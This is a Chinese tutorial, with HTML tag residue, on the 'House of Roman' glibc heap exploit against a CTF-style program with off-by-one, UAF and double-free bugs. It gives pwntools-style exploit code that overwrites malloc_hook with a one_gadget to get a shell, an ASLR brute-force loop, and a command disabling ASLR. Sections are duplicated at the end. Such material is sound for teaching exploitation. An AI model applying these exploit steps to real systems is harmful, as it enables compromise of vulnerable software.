House of Roman 利用技术详解<\/h1>

一、概述<\/h2>
House of Roman 是一种不需要泄露 libc 地址的利用技术，通过堆内存布局和堆相关漏洞（如 UAF、off-by-one 等）实现 getshell。该技术的核心思想是利用局部写减少 ASLR 随机化程度，通过爆破绕过地址随机化保护。<\/p>

二、示例程序分析<\/h2>

保护机制<\/h3>

Arch: amd64-64-little<\/li>
RELRO: Partial RELRO<\/li>
Stack: No canary found<\/li>
NX: NX enabled<\/li>

PIE: PIE enabled<\/li> <\/ul>

程序功能<\/h3>

Malloc<\/strong>: 用户输入 size，然后 malloc(size)，大小不限<\/li>
Write<\/strong>: 往指定 heap_ptr 写入 size+1 字节数据（存在一字节溢出）<\/li>

Free<\/strong>: 调用 free 释放 heap_ptr，但没有清零指针（存在 double free 和 UAF）<\/li> <\/ol>
三、利用思路<\/h2>
核心思想<\/h3>
利用局部写减少 ASLR 随机化程度，通过爆破可能的部分地址。由于 ASLR 低 12 位随机化程度较小，这为爆破提供了可能。<\/p>
利用步骤<\/h3>

分配 3 个 chunk (A, B, C)，大小分别为 0x20, 0xd0, 0x70<\/li>
在 B + 0x78 处设置 p64(0x61) 伪造 size<\/li>
释放 B 进入 unsorted bin（此时 B+0x10 和 B+0x18 中有 main_arena 地址）<\/li>
再次分配 0xd0，会分配到 B（main_arena 地址依然存在）<\/li>
分配 3 个 0x70 的 chunk (D, E, F)<\/li>
在 A 触发单字节溢出，修改 B->size = 0x71<\/li>
释放 C 和 D，进入 fastbin（D->fd = C）<\/li>
利用 UAF 修改 D->fd 的低字节，使 D->fd=B<\/li>
此时 B->size = 0x71，B + 0x78 为 p64(0x61)，成功伪造 0x70 大小的 fastbin<\/li>
B->fd 为 main_arena 地址，通过修改低 2 字节指向 malloc_hook - 0x23<\/li>
分配 3 次 0x70 的 chunk，拿到包含 malloc_hook 的 chunk<\/li>
利用 unsorted bin 修改 malloc_hook 内容为 main_arena 地址<\/li>
利用部分写修改 malloc_hook 为 one_gadget<\/li>
多次释放一个指针触发 double free 异常，触发 malloc_printerr 实现 getshell<\/li> <\/ol>
四、详细利用过程<\/h2>
1. 初始堆布局<\/h3>
create(0x18<\/span>,0<\/span>) # 0x20<\/span> <\/span><\/span>create(0xc8<\/span>,1<\/span>) # 0xd0<\/span> <\/span><\/span>create(0x65<\/span>,2<\/span>) # 0x70<\/span> <\/span><\/span><\/code><\/pre>2. 伪造 size<\/h3> fake =<\/span> "A"<\/span>*<\/span>0x68<\/span> <\/span><\/span>fake +=<\/span> p64(0x61<\/span>) # fake size<\/span> <\/span><\/span>edit(1<\/span>,fake) <\/span><\/span><\/code><\/pre>3. 释放并重新分配<\/h3> free(1<\/span>) <\/span><\/span>create(0xc8<\/span>,1<\/span>) <\/span><\/span><\/code><\/pre>4. 分配 fastbin 并修改 size<\/h3> create(0x65<\/span>,3<\/span>) # b<\/span> <\/span><\/span>create(0x65<\/span>,15<\/span>) <\/span><\/span>create(0x65<\/span>,18<\/span>) <\/span><\/span> <\/span><\/span>over =<\/span> "A"<\/span>*<\/span>0x18<\/span> # off by one<\/span> <\/span><\/span>over +=<\/span> "<\/span>\x71<\/span>"<\/span> # set chunk 1's size --> 0x71<\/span> <\/span><\/span>edit(0<\/span>,over) <\/span><\/span><\/code><\/pre>5. 创建 fastbin 并修改 fd<\/h3> free(2<\/span>) <\/span><\/span>free(3<\/span>) <\/span><\/span>heap_po =<\/span> "<\/span>\x20<\/span>"<\/span> <\/span><\/span>edit(3<\/span>,heap_po) # 把 chunk 1 链入 fastbin<\/span> <\/span><\/span><\/code><\/pre>此时 fastbin 状态：<\/p> fastbins 0x70: 0x555555757160 —▸ 0x555555757020 —▸ 0x7ffff7dd1b78 (main_arena+88) <\/code><\/pre> 6. 修改指向 malloc_hook<\/h3> malloc_hook_nearly =<\/span> "<\/span>\xed\x1a<\/span>"<\/span> <\/span><\/span>edit(1<\/span>,malloc_hook_nearly) # 部分写修改 fastbin->fd<\/span> <\/span><\/span><\/code><\/pre>7. 分配获取 malloc_hook<\/h3> create(0x65<\/span>,0<\/span>) <\/span><\/span>create(0x65<\/span>,0<\/span>) <\/span><\/span>create(0x65<\/span>,0<\/span>) # 拿到了 malloc_hook<\/span> <\/span><\/span><\/code><\/pre>8. 修复 fastbin<\/h3> free(15<\/span>) <\/span><\/span>edit(15<\/span>,p64(0x00<\/span>)) # 修改 fd=0 修复 fastbin<\/span> <\/span><\/span><\/code><\/pre>9. unsorted bin 攻击<\/h3> create(0xc8<\/span>,1<\/span>) <\/span><\/span>create(0xc8<\/span>,1<\/span>) <\/span><\/span>create(0x18<\/span>,2<\/span>) <\/span><\/span>create(0xc8<\/span>,3<\/span>) <\/span><\/span>create(0xc8<\/span>,4<\/span>) <\/span><\/span>free(1<\/span>) <\/span><\/span>po =<\/span> "B"<\/span>*<\/span>8<\/span> <\/span><\/span>po +=<\/span> "<\/span>\x00\x1b<\/span>"<\/span> <\/span><\/span>edit(1<\/span>,po) <\/span><\/span>create(0xc8<\/span>,1<\/span>) # unsorted bin 使 malloc_hook 有 libc 地址<\/span> <\/span><\/span><\/code><\/pre>10. 修改 malloc_hook 为 one_gadget<\/h3> over =<\/span> "R"<\/span>*<\/span>0x13<\/span> # padding for malloc_hook<\/span> <\/span><\/span>over +=<\/span> "<\/span>\xa4\xd2\xaf<\/span>"<\/span> <\/span><\/span>edit(0<\/span>,over) # malloc_hook to one_gadget<\/span> <\/span><\/span><\/code><\/pre>11. 触发 getshell<\/h3> free(18<\/span>) <\/span><\/span>free(18<\/span>) # 触发 double free 异常<\/span> <\/span><\/span><\/code><\/pre>五、调试技巧<\/h2> 关闭 ASLR 方便调试：<\/li> <\/ol> echo 0<\/span> > \/proc\/sys\/kernel\/randomize_va_space <\/span><\/span><\/code><\/pre> 爆破脚本（由于 ASLR 需要多次尝试）：<\/li> <\/ol> #!\/bin\/bash <\/span><\/span><\/span><\/span>for<\/span> i in `<\/span>seq 1<\/span> 5000`<\/span>; do<\/span> <\/span><\/span> python final.py; <\/span><\/span>done<\/span> <\/span><\/span><\/code><\/pre>六、关键点总结<\/h2> 部分地址写<\/strong>：利用 ASLR 低 12 位随机化程度较小的特点<\/li> 堆布局<\/strong>：精心设计 chunk 大小和释放顺序<\/li> 伪造 fastbin<\/strong>：通过 off-by-one 修改 size 并伪造 fd<\/li> unsorted bin 攻击<\/strong>：用于向 malloc_hook 写入 libc 地址<\/li> one_gadget 写入<\/strong>：通过部分写修改 malloc_hook<\/li> 触发机制<\/strong>：通过 double free 触发 malloc_printerr<\/li> <\/ol> 七、参考资源<\/h2> House of Roman 原始说明<\/a><\/li> House of Roman GitHub 仓库<\/a><\/li> <\/ol>

House of Roman 利用技术详解<\/h1>

一、概述<\/h2> House of Roman 是一种不需要泄露 libc 地址的利用技术，通过堆内存布局和堆相关漏洞（如 UAF、off-by-one 等）实现 getshell。该技术的核心思想是利用局部写减少 ASLR 随机化程度，通过爆破绕过地址随机化保护。<\/p>

二、示例程序分析<\/h2>

三、利用思路<\/h2>

核心思想<\/h3> 利用局部写减少 ASLR 随机化程度，通过爆破可能的部分地址。由于 ASLR 低 12 位随机化程度较小，这为爆破提供了可能。<\/p>

四、详细利用过程<\/h2>

七、参考资源<\/h2> House of Roman 原始说明<\/a><\/li> House of Roman GitHub 仓库<\/a><\/li> <\/ol>

一、概述<\/h2>
House of Roman 是一种不需要泄露 libc 地址的利用技术，通过堆内存布局和堆相关漏洞（如 UAF、off-by-one 等）实现 getshell。该技术的核心思想是利用局部写减少 ASLR 随机化程度，通过爆破绕过地址随机化保护。<\/p>

核心思想<\/h3>
利用局部写减少 ASLR 随机化程度，通过爆破可能的部分地址。由于 ASLR 低 12 位随机化程度较小，这为爆破提供了可能。<\/p>

七、参考资源<\/h2>

House of Roman 原始说明<\/a><\/li>
House of Roman GitHub 仓库<\/a><\/li> <\/ol>